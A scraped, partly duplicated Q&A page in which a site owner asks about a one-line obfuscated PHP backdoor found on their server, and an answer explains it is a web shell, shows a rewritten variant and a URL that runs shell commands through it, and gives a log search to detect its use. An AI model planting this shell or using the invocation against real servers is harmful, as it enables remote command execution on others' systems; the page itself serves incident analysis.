I found a line of script left by the hacker in one of my PHP files. And it reads like this: <pre class="prettyprint"><code><?php ($_=@$_GET[2]).@$_($_POST[1]); ?> </code></pre> Can anyone please give some hints about what this line of code does? Thank you

I already posted it as a comment since the question was on hold, here now as an answer: It's a PHP shell. If you rewrite it to <code><?php ($_=@$_GET[2]).@$_($_GET[1]); ?></code> the URL <code>file.php?2=shell_exec&1=whoami</code> executes the command <code>whoami</code> on the shell. In your example, one param is passed by POST, one by GET. So it's a bit harder to call. You could also call other functions with it. The first parameter is always the function name, the second is a parameter for the called function. Apparently it's explained on http://h.ackack.net/tiny-php-shell.html (https://twitter.com/dragosr/status/116759108526415872) but the site doesn't load for me. /edit: If you have access to the server log files, you can search them to see if the hacker used this shell. A simple <code>egrep "(&|\?)2=.+" logs*</code> on the shell should work. You only see half of the executed command (only the GET, not POST), but maybe this helps to see if the attacker actually used his script.

Found codes left by hacker but don't understand what it does

I found a line of script left by the hacker in one of my PHP files. And it reads like this:

<?php

($_=@$_GET[2]).@$_($_POST[1]);

?>

Can anyone please give some hints about what this line of code does? Thank you

Do hackers have to know how do you code?

Hacking involves breaking protocols and exploiting a network; thus, being a hacker requires you to understand the languages of the software that you are focusing on. Having zero coding knowledge will limit your opportunities in the future. Hence, it is imperative to have a knack for programming.

What coding language do hackers use?

Python ranks as the number one popular programming language in the world, according to 2022 Tiobe Index data. It's also a popular language with hackers because it provides powerful and easy-to-use libraries enabling them to work quickly.

What do hackers do with the information they find?

Applying for credit cards or loans in your name. Accessing your bank accounts, retirement accounts and other financial accounts. Filing fraudulent tax returns to get an income tax refund in your name. Using your health insurance to access medical care.

I already posted it as a comment since the question was on hold, here now as an answer:

It's a PHP shell. If you rewrite it to <?php ($_=@$_GET[2]).@$_($_GET[1]); ?> the URL file.php?2=shell_exec&1=whoami executes the command whoami on the shell. In your example, one param is passed by POST, one by GET. So it's a bit harder to call.

You could also call other functions with it. The first parameter is always the function name, the second is a parameter for the called function.

Apparently it's explained on http://h.ackack.net/tiny-php-shell.html (https://twitter.com/dragosr/status/116759108526415872) but the site doesn't load for me.

/edit: If you have access to the server log files, you can search them to see if the hacker used this shell. A simple egrep "(&|\?)2=.+" logs* on the shell should work. You only see half of the executed command (only the GET, not POST), but maybe this helps to see if the attacker actually used his script.

Found codes left by hacker but don't understand what it does

Tags:

security

php

deobfuscation

cracking

user2926814

People also ask

1 Answers

Reeno

Recent Activity

Donate For Us

Found codes left by hacker but don't understand what it does

Tags:

security

php

deobfuscation

cracking

user2926814

People also ask

1 Answers

Reeno

Related questions

Recent Activity

Donate For Us